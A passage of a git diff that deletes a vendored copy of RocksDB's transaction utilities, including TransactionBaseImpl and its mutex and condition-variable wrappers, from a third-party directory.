-  return s;
-}
-
-std::vector<Status> TransactionBaseImpl::MultiGet(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_family,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  size_t num_keys = keys.size();
-  values->resize(num_keys);
-
-  std::vector<Status> stat_list(num_keys);
-  for (size_t i = 0; i < num_keys; ++i) {
-    std::string* value = values ? &(*values)[i] : nullptr;
-    stat_list[i] = Get(read_options, column_family[i], keys[i], value);
-  }
-
-  return stat_list;
-}
-
-std::vector<Status> TransactionBaseImpl::MultiGetForUpdate(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_family,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  // Regardless of whether the MultiGet succeeded, track these keys.
-  size_t num_keys = keys.size();
-  values->resize(num_keys);
-
-  // Lock all keys
-  for (size_t i = 0; i < num_keys; ++i) {
-    Status s = TryLock(column_family[i], keys[i], true /* read_only */,
-                       true /* exclusive */);
-    if (!s.ok()) {
-      // Fail entire multiget if we cannot lock all keys
-      return std::vector<Status>(num_keys, s);
-    }
-  }
-
-  // TODO(agiardullo): optimize multiget?
-  std::vector<Status> stat_list(num_keys);
-  for (size_t i = 0; i < num_keys; ++i) {
-    std::string* value = values ? &(*values)[i] : nullptr;
-    stat_list[i] = Get(read_options, column_family[i], keys[i], value);
-  }
-
-  return stat_list;
-}
-
-Iterator* TransactionBaseImpl::GetIterator(const ReadOptions& read_options) {
-  Iterator* db_iter = db_->NewIterator(read_options);
-  assert(db_iter);
-
-  return write_batch_.NewIteratorWithBase(db_iter);
-}
-
-Iterator* TransactionBaseImpl::GetIterator(const ReadOptions& read_options,
-                                           ColumnFamilyHandle* column_family) {
-  Iterator* db_iter = db_->NewIterator(read_options, column_family);
-  assert(db_iter);
-
-  return write_batch_.NewIteratorWithBase(column_family, db_iter);
-}
-
-Status TransactionBaseImpl::Put(ColumnFamilyHandle* column_family,
-                                const Slice& key, const Slice& value) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Put(column_family, key, value);
-    if (s.ok()) {
-      num_puts_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::Put(ColumnFamilyHandle* column_family,
-                                const SliceParts& key,
-                                const SliceParts& value) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Put(column_family, key, value);
-    if (s.ok()) {
-      num_puts_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::Merge(ColumnFamilyHandle* column_family,
-                                  const Slice& key, const Slice& value) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Merge(column_family, key, value);
-    if (s.ok()) {
-      num_merges_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::Delete(ColumnFamilyHandle* column_family,
-                                   const Slice& key) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Delete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::Delete(ColumnFamilyHandle* column_family,
-                                   const SliceParts& key) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Delete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::SingleDelete(ColumnFamilyHandle* column_family,
-                                         const Slice& key) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->SingleDelete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::SingleDelete(ColumnFamilyHandle* column_family,
-                                         const SliceParts& key) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->SingleDelete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::PutUntracked(ColumnFamilyHandle* column_family,
-                                         const Slice& key, const Slice& value) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Put(column_family, key, value);
-    if (s.ok()) {
-      num_puts_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::PutUntracked(ColumnFamilyHandle* column_family,
-                                         const SliceParts& key,
-                                         const SliceParts& value) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Put(column_family, key, value);
-    if (s.ok()) {
-      num_puts_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::MergeUntracked(ColumnFamilyHandle* column_family,
-                                           const Slice& key,
-                                           const Slice& value) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Merge(column_family, key, value);
-    if (s.ok()) {
-      num_merges_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::DeleteUntracked(ColumnFamilyHandle* column_family,
-                                            const Slice& key) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Delete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::DeleteUntracked(ColumnFamilyHandle* column_family,
-                                            const SliceParts& key) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Delete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-void TransactionBaseImpl::PutLogData(const Slice& blob) {
-  write_batch_.PutLogData(blob);
-}
-
-WriteBatchWithIndex* TransactionBaseImpl::GetWriteBatch() {
-  return &write_batch_;
-}
-
-uint64_t TransactionBaseImpl::GetElapsedTime() const {
-  return (db_->GetEnv()->NowMicros() - start_time_) / 1000;
-}
-
-uint64_t TransactionBaseImpl::GetNumPuts() const { return num_puts_; }
-
-uint64_t TransactionBaseImpl::GetNumDeletes() const { return num_deletes_; }
-
-uint64_t TransactionBaseImpl::GetNumMerges() const { return num_merges_; }
-
-uint64_t TransactionBaseImpl::GetNumKeys() const {
-  uint64_t count = 0;
-
-  // sum up locked keys in all column families
-  for (const auto& key_map_iter : tracked_keys_) {
-    const auto& keys = key_map_iter.second;
-    count += keys.size();
-  }
-
-  return count;
-}
-
-void TransactionBaseImpl::TrackKey(uint32_t cfh_id, const std::string& key,
-                                   SequenceNumber seq, bool read_only,
-                                   bool exclusive) {
-  // Update map of all tracked keys for this transaction
-  TrackKey(&tracked_keys_, cfh_id, key, seq, read_only, exclusive);
-
-  if (save_points_ != nullptr && !save_points_->empty()) {
-    // Update map of tracked keys in this SavePoint
-    TrackKey(&save_points_->top().new_keys_, cfh_id, key, seq, read_only,
-             exclusive);
-  }
-}
-
-// Add a key to the given TransactionKeyMap
-void TransactionBaseImpl::TrackKey(TransactionKeyMap* key_map, uint32_t cfh_id,
-                                   const std::string& key, SequenceNumber seq,
-                                   bool read_only, bool exclusive) {
-  auto& cf_key_map = (*key_map)[cfh_id];
-  auto iter = cf_key_map.find(key);
-  if (iter == cf_key_map.end()) {
-    auto result = cf_key_map.insert({key, TransactionKeyMapInfo(seq)});
-    iter = result.first;
-  } else if (seq < iter->second.seq) {
-    // Now tracking this key with an earlier sequence number
-    iter->second.seq = seq;
-  }
-
-  if (read_only) {
-    iter->second.num_reads++;
-  } else {
-    iter->second.num_writes++;
-  }
-  iter->second.exclusive |= exclusive;
-}
-
-std::unique_ptr<TransactionKeyMap>
-TransactionBaseImpl::GetTrackedKeysSinceSavePoint() {
-  if (save_points_ != nullptr && !save_points_->empty()) {
-    // Examine the number of reads/writes performed on all keys written
-    // since the last SavePoint and compare to the total number of reads/writes
-    // for each key.
-    TransactionKeyMap* result = new TransactionKeyMap();
-    for (const auto& key_map_iter : save_points_->top().new_keys_) {
-      uint32_t column_family_id = key_map_iter.first;
-      auto& keys = key_map_iter.second;
-
-      auto& cf_tracked_keys = tracked_keys_[column_family_id];
-
-      for (const auto& key_iter : keys) {
-        const std::string& key = key_iter.first;
-        uint32_t num_reads = key_iter.second.num_reads;
-        uint32_t num_writes = key_iter.second.num_writes;
-
-        auto total_key_info = cf_tracked_keys.find(key);
-        assert(total_key_info != cf_tracked_keys.end());
-        assert(total_key_info->second.num_reads >= num_reads);
-        assert(total_key_info->second.num_writes >= num_writes);
-
-        if (total_key_info->second.num_reads == num_reads &&
-            total_key_info->second.num_writes == num_writes) {
-          // All the reads/writes to this key were done in the last savepoint.
-          bool read_only = (num_writes == 0);
-          TrackKey(result, column_family_id, key, key_iter.second.seq,
-                   read_only, key_iter.second.exclusive);
-        }
-      }
-    }
-    return std::unique_ptr<TransactionKeyMap>(result);
-  }
-
-  // No SavePoint
-  return nullptr;
-}
-
-// Gets the write batch that should be used for Put/Merge/Deletes.
-//
-// Returns either a WriteBatch or WriteBatchWithIndex depending on whether
-// DisableIndexing() has been called.
-WriteBatchBase* TransactionBaseImpl::GetBatchForWrite() {
-  if (indexing_enabled_) {
-    // Use WriteBatchWithIndex
-    return &write_batch_;
-  } else {
-    // Don't use WriteBatchWithIndex. Return base WriteBatch.
-    return write_batch_.GetWriteBatch();
-  }
-}
-
-void TransactionBaseImpl::ReleaseSnapshot(const Snapshot* snapshot, DB* db) {
-  if (snapshot != nullptr) {
-    db->ReleaseSnapshot(snapshot);
-  }
-}
-
-void TransactionBaseImpl::UndoGetForUpdate(ColumnFamilyHandle* column_family,
-                                           const Slice& key) {
-  uint32_t column_family_id = GetColumnFamilyID(column_family);
-  auto& cf_tracked_keys = tracked_keys_[column_family_id];
-  std::string key_str = key.ToString();
-  bool can_decrement = false;
-  bool can_unlock __attribute__((unused)) = false;
-
-  if (save_points_ != nullptr && !save_points_->empty()) {
-    // Check if this key was fetched ForUpdate in this SavePoint
-    auto& cf_savepoint_keys = save_points_->top().new_keys_[column_family_id];
-
-    auto savepoint_iter = cf_savepoint_keys.find(key_str);
-    if (savepoint_iter != cf_savepoint_keys.end()) {
-      if (savepoint_iter->second.num_reads > 0) {
-        savepoint_iter->second.num_reads--;
-        can_decrement = true;
-
-        if (savepoint_iter->second.num_reads == 0 &&
-            savepoint_iter->second.num_writes == 0) {
-          // No other GetForUpdates or write on this key in this SavePoint
-          cf_savepoint_keys.erase(savepoint_iter);
-          can_unlock = true;
-        }
-      }
-    }
-  } else {
-    // No SavePoint set
-    can_decrement = true;
-    can_unlock = true;
-  }
-
-  // We can only decrement the read count for this key if we were able to
-  // decrement the read count in the current SavePoint, OR if there is no
-  // SavePoint set.
-  if (can_decrement) {
-    auto key_iter = cf_tracked_keys.find(key_str);
-
-    if (key_iter != cf_tracked_keys.end()) {
-      if (key_iter->second.num_reads > 0) {
-        key_iter->second.num_reads--;
-
-        if (key_iter->second.num_reads == 0 &&
-            key_iter->second.num_writes == 0) {
-          // No other GetForUpdates or writes on this key
-          assert(can_unlock);
-          cf_tracked_keys.erase(key_iter);
-          UnlockGetForUpdate(column_family, key);
-        }
-      }
-    }
-  }
-}
-
-Status TransactionBaseImpl::RebuildFromWriteBatch(WriteBatch* src_batch) {
-  struct IndexedWriteBatchBuilder : public WriteBatch::Handler {
-    Transaction* txn_;
-    DBImpl* db_;
-    IndexedWriteBatchBuilder(Transaction* txn, DBImpl* db)
-        : txn_(txn), db_(db) {
-      assert(dynamic_cast<TransactionBaseImpl*>(txn_) != nullptr);
-    }
-
-    Status PutCF(uint32_t cf, const Slice& key, const Slice& val) override {
-      return txn_->Put(db_->GetColumnFamilyHandle(cf), key, val);
-    }
-
-    Status DeleteCF(uint32_t cf, const Slice& key) override {
-      return txn_->Delete(db_->GetColumnFamilyHandle(cf), key);
-    }
-
-    Status SingleDeleteCF(uint32_t cf, const Slice& key) override {
-      return txn_->SingleDelete(db_->GetColumnFamilyHandle(cf), key);
-    }
-
-    Status MergeCF(uint32_t cf, const Slice& key, const Slice& val) override {
-      return txn_->Merge(db_->GetColumnFamilyHandle(cf), key, val);
-    }
-
-    // this is used for reconstructing prepared transactions upon
-    // recovery. there should not be any meta markers in the batches
-    // we are processing.
-    Status MarkBeginPrepare() override { return Status::InvalidArgument(); }
-
-    Status MarkEndPrepare(const Slice&) override {
-      return Status::InvalidArgument();
-    }
-
-    Status MarkCommit(const Slice&) override {
-      return Status::InvalidArgument();
-    }
-
-    Status MarkRollback(const Slice&) override {
-      return Status::InvalidArgument();
-    }
-  };
-
-  IndexedWriteBatchBuilder copycat(this, dbimpl_);
-  return src_batch->Iterate(&copycat);
-}
-
-WriteBatch* TransactionBaseImpl::GetCommitTimeWriteBatch() {
-  return &commit_time_batch_;
-}
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_base.h b/thirdparty/rocksdb/utilities/transactions/transaction_base.h
deleted file mode 100644
index c73b329..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_base.h
+++ /dev/null
@@ -1,338 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <stack>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-class TransactionBaseImpl : public Transaction {
- public:
-  TransactionBaseImpl(DB* db, const WriteOptions& write_options);
-
-  virtual ~TransactionBaseImpl();
-
-  // Remove pending operations queued in this transaction.
-  virtual void Clear();
-
-  void Reinitialize(DB* db, const WriteOptions& write_options);
-
-  // Called before executing Put, Merge, Delete, and GetForUpdate.  If TryLock
-  // returns non-OK, the Put/Merge/Delete/GetForUpdate will be failed.
-  // untracked will be true if called from PutUntracked, DeleteUntracked, or
-  // MergeUntracked.
-  virtual Status TryLock(ColumnFamilyHandle* column_family, const Slice& key,
-                         bool read_only, bool exclusive,
-                         bool untracked = false) = 0;
-
-  void SetSavePoint() override;
-
-  Status RollbackToSavePoint() override;
-
-  using Transaction::Get;
-  Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family,
-             const Slice& key, std::string* value) override;
-
-  Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family,
-             const Slice& key, PinnableSlice* value) override;
-
-  Status Get(const ReadOptions& options, const Slice& key,
-             std::string* value) override {
-    return Get(options, db_->DefaultColumnFamily(), key, value);
-  }
-
-  using Transaction::GetForUpdate;
-  Status GetForUpdate(const ReadOptions& options,
-                      ColumnFamilyHandle* column_family, const Slice& key,
-                      std::string* value, bool exclusive) override;
-
-  Status GetForUpdate(const ReadOptions& options,
-                      ColumnFamilyHandle* column_family, const Slice& key,
-                      PinnableSlice* pinnable_val, bool exclusive) override;
-
-  Status GetForUpdate(const ReadOptions& options, const Slice& key,
-                      std::string* value, bool exclusive) override {
-    return GetForUpdate(options, db_->DefaultColumnFamily(), key, value,
-                        exclusive);
-  }
-
-  std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  std::vector<Status> MultiGet(const ReadOptions& options,
-                               const std::vector<Slice>& keys,
-                               std::vector<std::string>* values) override {
-    return MultiGet(options, std::vector<ColumnFamilyHandle*>(
-                                 keys.size(), db_->DefaultColumnFamily()),
-                    keys, values);
-  }
-
-  std::vector<Status> MultiGetForUpdate(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  std::vector<Status> MultiGetForUpdate(
-      const ReadOptions& options, const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
-    return MultiGetForUpdate(options,
-                             std::vector<ColumnFamilyHandle*>(
-                                 keys.size(), db_->DefaultColumnFamily()),
-                             keys, values);
-  }
-
-  Iterator* GetIterator(const ReadOptions& read_options) override;
-  Iterator* GetIterator(const ReadOptions& read_options,
-                        ColumnFamilyHandle* column_family) override;
-
-  Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-             const Slice& value) override;
-  Status Put(const Slice& key, const Slice& value) override {
-    return Put(nullptr, key, value);
-  }
-
-  Status Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-             const SliceParts& value) override;
-  Status Put(const SliceParts& key, const SliceParts& value) override {
-    return Put(nullptr, key, value);
-  }
-
-  Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-               const Slice& value) override;
-  Status Merge(const Slice& key, const Slice& value) override {
-    return Merge(nullptr, key, value);
-  }
-
-  Status Delete(ColumnFamilyHandle* column_family, const Slice& key) override;
-  Status Delete(const Slice& key) override { return Delete(nullptr, key); }
-  Status Delete(ColumnFamilyHandle* column_family,
-                const SliceParts& key) override;
-  Status Delete(const SliceParts& key) override { return Delete(nullptr, key); }
-
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const Slice& key) override;
-  Status SingleDelete(const Slice& key) override {
-    return SingleDelete(nullptr, key);
-  }
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const SliceParts& key) override;
-  Status SingleDelete(const SliceParts& key) override {
-    return SingleDelete(nullptr, key);
-  }
-
-  Status PutUntracked(ColumnFamilyHandle* column_family, const Slice& key,
-                      const Slice& value) override;
-  Status PutUntracked(const Slice& key, const Slice& value) override {
-    return PutUntracked(nullptr, key, value);
-  }
-
-  Status PutUntracked(ColumnFamilyHandle* column_family, const SliceParts& key,
-                      const SliceParts& value) override;
-  Status PutUntracked(const SliceParts& key, const SliceParts& value) override {
-    return PutUntracked(nullptr, key, value);
-  }
-
-  Status MergeUntracked(ColumnFamilyHandle* column_family, const Slice& key,
-                        const Slice& value) override;
-  Status MergeUntracked(const Slice& key, const Slice& value) override {
-    return MergeUntracked(nullptr, key, value);
-  }
-
-  Status DeleteUntracked(ColumnFamilyHandle* column_family,
-                         const Slice& key) override;
-  Status DeleteUntracked(const Slice& key) override {
-    return DeleteUntracked(nullptr, key);
-  }
-  Status DeleteUntracked(ColumnFamilyHandle* column_family,
-                         const SliceParts& key) override;
-  Status DeleteUntracked(const SliceParts& key) override {
-    return DeleteUntracked(nullptr, key);
-  }
-
-  void PutLogData(const Slice& blob) override;
-
-  WriteBatchWithIndex* GetWriteBatch() override;
-
-  virtual void SetLockTimeout(int64_t timeout) override { /* Do nothing */
-  }
-
-  const Snapshot* GetSnapshot() const override {
-    return snapshot_ ? snapshot_.get() : nullptr;
-  }
-
-  void SetSnapshot() override;
-  void SetSnapshotOnNextOperation(
-      std::shared_ptr<TransactionNotifier> notifier = nullptr) override;
-
-  void ClearSnapshot() override {
-    snapshot_.reset();
-    snapshot_needed_ = false;
-    snapshot_notifier_ = nullptr;
-  }
-
-  void DisableIndexing() override { indexing_enabled_ = false; }
-
-  void EnableIndexing() override { indexing_enabled_ = true; }
-
-  uint64_t GetElapsedTime() const override;
-
-  uint64_t GetNumPuts() const override;
-
-  uint64_t GetNumDeletes() const override;
-
-  uint64_t GetNumMerges() const override;
-
-  uint64_t GetNumKeys() const override;
-
-  void UndoGetForUpdate(ColumnFamilyHandle* column_family,
-                        const Slice& key) override;
-  void UndoGetForUpdate(const Slice& key) override {
-    return UndoGetForUpdate(nullptr, key);
-  };
-
-  // Get list of keys in this transaction that must not have any conflicts
-  // with writes in other transactions.
-  const TransactionKeyMap& GetTrackedKeys() const { return tracked_keys_; }
-
-  WriteOptions* GetWriteOptions() override { return &write_options_; }
-
-  void SetWriteOptions(const WriteOptions& write_options) override {
-    write_options_ = write_options;
-  }
-
-  // Used for memory management for snapshot_
-  void ReleaseSnapshot(const Snapshot* snapshot, DB* db);
-
-  // iterates over the given batch and makes the appropriate inserts.
-  // used for rebuilding prepared transactions after recovery.
-  Status RebuildFromWriteBatch(WriteBatch* src_batch) override;
-
-  WriteBatch* GetCommitTimeWriteBatch() override;
-
- protected:
-  // Add a key to the list of tracked keys.
-  //
-  // seqno is the earliest seqno this key was involved with this transaction.
-  // readonly should be set to true if no data was written for this key
-  void TrackKey(uint32_t cfh_id, const std::string& key, SequenceNumber seqno,
-                bool readonly, bool exclusive);
-
-  // Helper function to add a key to the given TransactionKeyMap
-  static void TrackKey(TransactionKeyMap* key_map, uint32_t cfh_id,
-                       const std::string& key, SequenceNumber seqno,
-                       bool readonly, bool exclusive);
-
-  // Called when UndoGetForUpdate determines that this key can be unlocked.
-  virtual void UnlockGetForUpdate(ColumnFamilyHandle* column_family,
-                                  const Slice& key) = 0;
-
-  std::unique_ptr<TransactionKeyMap> GetTrackedKeysSinceSavePoint();
-
-  // Sets a snapshot if SetSnapshotOnNextOperation() has been called.
-  void SetSnapshotIfNeeded();
-
-  DB* db_;
-  DBImpl* dbimpl_;
-
-  WriteOptions write_options_;
-
-  const Comparator* cmp_;
-
-  // Stores that time the txn was constructed, in microseconds.
-  uint64_t start_time_;
-
-  // Stores the current snapshot that was set by SetSnapshot or null if
-  // no snapshot is currently set.
-  std::shared_ptr<const Snapshot> snapshot_;
-
-  // Count of various operations pending in this transaction
-  uint64_t num_puts_ = 0;
-  uint64_t num_deletes_ = 0;
-  uint64_t num_merges_ = 0;
-
-  struct SavePoint {
-    std::shared_ptr<const Snapshot> snapshot_;
-    bool snapshot_needed_;
-    std::shared_ptr<TransactionNotifier> snapshot_notifier_;
-    uint64_t num_puts_;
-    uint64_t num_deletes_;
-    uint64_t num_merges_;
-
-    // Record all keys tracked since the last savepoint
-    TransactionKeyMap new_keys_;
-
-    SavePoint(std::shared_ptr<const Snapshot> snapshot, bool snapshot_needed,
-              std::shared_ptr<TransactionNotifier> snapshot_notifier,
-              uint64_t num_puts, uint64_t num_deletes, uint64_t num_merges)
-        : snapshot_(snapshot),
-          snapshot_needed_(snapshot_needed),
-          snapshot_notifier_(snapshot_notifier),
-          num_puts_(num_puts),
-          num_deletes_(num_deletes),
-          num_merges_(num_merges) {}
-  };
-
-  // Records writes pending in this transaction
-  WriteBatchWithIndex write_batch_;
-
- private:
-  // batch to be written at commit time
-  WriteBatch commit_time_batch_;
-
-  // Stack of the Snapshot saved at each save point.  Saved snapshots may be
-  // nullptr if there was no snapshot at the time SetSavePoint() was called.
-  std::unique_ptr<std::stack<TransactionBaseImpl::SavePoint>> save_points_;
-
-  // Map from column_family_id to map of keys that are involved in this
-  // transaction.
-  // Pessimistic Transactions will do conflict checking before adding a key
-  // by calling TrackKey().
-  // Optimistic Transactions will wait till commit time to do conflict checking.
-  TransactionKeyMap tracked_keys_;
-
-  // If true, future Put/Merge/Deletes will be indexed in the
-  // WriteBatchWithIndex.
-  // If false, future Put/Merge/Deletes will be inserted directly into the
-  // underlying WriteBatch and not indexed in the WriteBatchWithIndex.
-  bool indexing_enabled_;
-
-  // SetSnapshotOnNextOperation() has been called and the snapshot has not yet
-  // been reset.
-  bool snapshot_needed_ = false;
-
-  // SetSnapshotOnNextOperation() has been called and the caller would like
-  // a notification through the TransactionNotifier interface
-  std::shared_ptr<TransactionNotifier> snapshot_notifier_ = nullptr;
-
-  Status TryLock(ColumnFamilyHandle* column_family, const SliceParts& key,
-                 bool read_only, bool exclusive, bool untracked = false);
-
-  WriteBatchBase* GetBatchForWrite();
-
-  void SetSnapshotInternal(const Snapshot* snapshot);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.cc b/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.cc
deleted file mode 100644
index b6120a1..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.cc
+++ /dev/null
@@ -1,135 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/transaction_db_mutex_impl.h"
-
-#include <chrono>
-#include <condition_variable>
-#include <functional>
-#include <mutex>
-
-#include "rocksdb/utilities/transaction_db_mutex.h"
-
-namespace rocksdb {
-
-class TransactionDBMutexImpl : public TransactionDBMutex {
- public:
-  TransactionDBMutexImpl() {}
-  ~TransactionDBMutexImpl() {}
-
-  Status Lock() override;
-
-  Status TryLockFor(int64_t timeout_time) override;
-
-  void UnLock() override { mutex_.unlock(); }
-
-  friend class TransactionDBCondVarImpl;
-
- private:
-  std::mutex mutex_;
-};
-
-class TransactionDBCondVarImpl : public TransactionDBCondVar {
- public:
-  TransactionDBCondVarImpl() {}
-  ~TransactionDBCondVarImpl() {}
-
-  Status Wait(std::shared_ptr<TransactionDBMutex> mutex) override;
-
-  Status WaitFor(std::shared_ptr<TransactionDBMutex> mutex,
-                 int64_t timeout_time) override;
-
-  void Notify() override { cv_.notify_one(); }
-
-  void NotifyAll() override { cv_.notify_all(); }
-
- private:
-  std::condition_variable cv_;
-};
-
-std::shared_ptr<TransactionDBMutex>
-TransactionDBMutexFactoryImpl::AllocateMutex() {
-  return std::shared_ptr<TransactionDBMutex>(new TransactionDBMutexImpl());
-}
-
-std::shared_ptr<TransactionDBCondVar>
-TransactionDBMutexFactoryImpl::AllocateCondVar() {
-  return std::shared_ptr<TransactionDBCondVar>(new TransactionDBCondVarImpl());
-}
-
-Status TransactionDBMutexImpl::Lock() {
-  mutex_.lock();
-  return Status::OK();
-}
-
-Status TransactionDBMutexImpl::TryLockFor(int64_t timeout_time) {
-  bool locked = true;
-
-  if (timeout_time == 0) {
-    locked = mutex_.try_lock();
-  } else {
-    // Previously, this code used a std::timed_mutex.  However, this was changed
-    // due to known bugs in gcc versions < 4.9.
-    // https://gcc.gnu.org/bugzilla/show_bug.cgi?id=54562
-    //
-    // Since this mutex isn't held for long and only a single mutex is ever
-    // held at a time, it is reasonable to ignore the lock timeout_time here
-    // and only check it when waiting on the condition_variable.
-    mutex_.lock();
-  }
-
-  if (!locked) {
-    // timeout acquiring mutex
-    return Status::TimedOut(Status::SubCode::kMutexTimeout);
-  }
-
-  return Status::OK();
-}
-
-Status TransactionDBCondVarImpl::Wait(
-    std::shared_ptr<TransactionDBMutex> mutex) {
-  auto mutex_impl = reinterpret_cast<TransactionDBMutexImpl*>(mutex.get());
-
-  std::unique_lock<std::mutex> lock(mutex_impl->mutex_, std::adopt_lock);
-  cv_.wait(lock);
-
-  // Make sure unique_lock doesn't unlock mutex when it destructs
-  lock.release();
-
-  return Status::OK();
-}
-
-Status TransactionDBCondVarImpl::WaitFor(
-    std::shared_ptr<TransactionDBMutex> mutex, int64_t timeout_time) {
-  Status s;
-
-  auto mutex_impl = reinterpret_cast<TransactionDBMutexImpl*>(mutex.get());
-  std::unique_lock<std::mutex> lock(mutex_impl->mutex_, std::adopt_lock);
-
-  if (timeout_time < 0) {
-    // If timeout is negative, do not use a timeout
-    cv_.wait(lock);
-  } else {
-    auto duration = std::chrono::microseconds(timeout_time);
-    auto cv_status = cv_.wait_for(lock, duration);
-
-    // Check if the wait stopped due to timing out.
-    if (cv_status == std::cv_status::timeout) {
-      s = Status::TimedOut(Status::SubCode::kMutexTimeout);
-    }
-  }
-
-  // Make sure unique_lock doesn't unlock mutex when it destructs
-  lock.release();
-
-  // CV was signaled, or we spuriously woke up (but didn't time out)
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.h b/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.h
deleted file mode 100644
index 2cce05b..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.h
+++ /dev/null
@@ -1,26 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/transaction_db_mutex.h"
-
-namespace rocksdb {
-
-class TransactionDBMutex;
-class TransactionDBCondVar;
-
-// Default implementation of TransactionDBMutexFactory.  May be overridden
-// by TransactionDBOptions.custom_mutex_factory.
-class TransactionDBMutexFactoryImpl : public TransactionDBMutexFactory {
- public:
-  std::shared_ptr<TransactionDBMutex> AllocateMutex() override;
-  std::shared_ptr<TransactionDBCondVar> AllocateCondVar() override;
-};
-
-}  //  namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.cc b/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.cc
deleted file mode 100644
